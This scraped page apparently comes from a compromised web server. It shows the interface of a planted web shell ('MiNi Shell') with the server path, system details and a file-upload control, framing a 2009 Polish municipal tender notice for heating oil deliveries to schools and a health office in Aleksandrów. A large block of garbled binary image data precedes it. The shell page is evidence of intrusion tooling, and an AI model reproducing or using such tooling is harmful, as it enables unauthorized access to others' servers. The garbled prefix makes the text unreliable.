JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091008/172543-N-2009.html

<p class="kh_header"><b>Aleksandrów: Dostawa  oleju opałowego dla  Urzędu Gminy , Ośrodka Zdrowia i Szkół  na terenie gminy Aleksandrów w sezonie 2009/2010 w ilości  100.000 litrów z możliwością zakupu mniejszej ilości.</b><br>
<b>Numer ogłoszenia: 172543 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Aleksandrów , Aleksandrów 39b, 26-337 Aleksandrów, woj. łódzkie, tel. 044 7560027, faks 044 7560014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.aleksandrow.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  oleju opałowego dla  Urzędu Gminy , Ośrodka Zdrowia i Szkół  na terenie gminy Aleksandrów w sezonie 2009/2010 w ilości  100.000 litrów z możliwością zakupu mniejszej ilości..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa  oleju opałowego dla  Urzędu Gminy , Ośrodka Zdrowia i Szkół  na terenie gminy Aleksandrów w sezonie 2009/2010 w ilości  100.000 litrów z możliwością zakupu mniejszej ilości.
Dostawę 	własnym  transportem i  	wyładunkiem  następujące partie  oleju opałowego 	lekkiego 	poniżej 1% zawartości siarki 	dla :
          1/  Szkoły Podstawowej w Aleksandrowie-                       12 000 l
          2/ Gimnazjum w Dąbrowie n/Czarną                                20 000 l
          3/Szkoły Podstawowej w Skotnikach                                 15 000 l
          4/Szkoły Podstawowej w Dąbrowie n/Czarną                   23 000 l
          5/ Urząd Gminy i Ośrodek Zdrowia  w Aleksandrowie   30 000 l.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 23.12.21.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29     
     stycznia 2004 roku Dz. U. z 2004 r. Nr 19, poz. 177 z późniejszymi. zmianami tj.:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień, 
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
zdolnymi do wykonania zamówienia;
-   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów
art.24 ust. 1 lub 2 Pzp,                                  
b spełnią warunki udziału w postępowaniu określone w SIWZ. tzn.
Wykonawca posiada odpowiednie doświadczenie tj. w  okresie ostatnich trzech lat kalendarzowych
  licząc do dnia wszczęcia postępowania , a jeżeli okres prowadzenia działalności jest krótszy -
 w tym okresie wykonał co najmniej dwie dostawy  odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia 
Posiada płynność finansową przez co zamawiający rozumie dostęp do wolnych środków na rachunku bankowym lub spółdzielczej kasie oszczędnościowo rozliczeniowej na kwotę nie mniejszą niż 
20 tys zł.
Ocena spełnienia przez wykonawców wymaganych warunków, zostanie dokonana wg formuły spełnia - nie spełnia
10.2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zaakceptują warunki umowy   określone w załączniku Nr 2 do SIWZ.                                                                     
 10.3.Ocena spełniania warunków udziału w postępowaniu o udzielenie zamówienia publicznego
   dokonywana będzie w oparciu o przedłożone przez Wykonawcę oświadczenia i dokumenty, o    
   których mowa w pkt 11. 
 10.4.Dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za
  zgodność z oryginałem przez Wykonawcę lub osobę uprawnioną do składania oświadczeń woli   w imieniu Wykonawcy. W przypadku składania kserokopii poświadczonej za zgodność z  
  oryginałem. Zamawiający wymaga, aby każda strona takiego dokumentu opatrzona była 
  klauzulą Za zgodność z oryginałem. 
 10.5.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii
   dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest   nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 11.1.Wypełniony druk Formularz ofertowy, który należy sporządzić zgodnie ze wzorem- załącznik  
         nr 1 do specyfikacji.
11.2.Oświadczenie Wykonawcy o spełnieniu warunków określonych w art.22 ust.1 i nie podleganiu
   wykluczeniu z postępowania na podstawie art.24 ust 1 i 2 ustawy PZP -                            załącznik nr 3 do   specyfikacji. 
11.3.Dokumenty potwierdzające spełnianie przez Wykonawcę warunków, o których mowa w art.
   22 ustawy Prawo zamówień publicznych w postaci:
a aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji    
   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do  
   ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed  
   upływem terminu składania ofert. W przypadku gdy dokument ten wystawiony jest 
  wcześniej niż 6 miesięcy przed upływem terminu składania ofert winien on być potwierdzony 
  przez Urząd wydający, że wpis jest aktualny i zgodny ze stanem prawnym,
b zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu 
    Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego 
    odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na
    ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem  
    zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
    wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed 
    upływem terminu składania ofert,
c aktualną koncesję na obrót paliwami ciekłymi,
d informacje z Banku lub Spółdzielczej Kasy Oszczędnościowo - Kredytowej,  w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości 20 tys. zł., wystawionej nie wcześniej niż 3 m-ce przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
e wykaz wykonanych dostaw odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia wraz z dokumentami potwierdzającymi ich wykonanie referencje.
Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie wykonawcy z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.aleksandrow.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Aleksandrowie, 26-337 Aleksandrów 39B, pokój 104.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: Urząd Gminy w Aleksandrowie, 26-337 Aleksandrów 39B, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 18.11.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com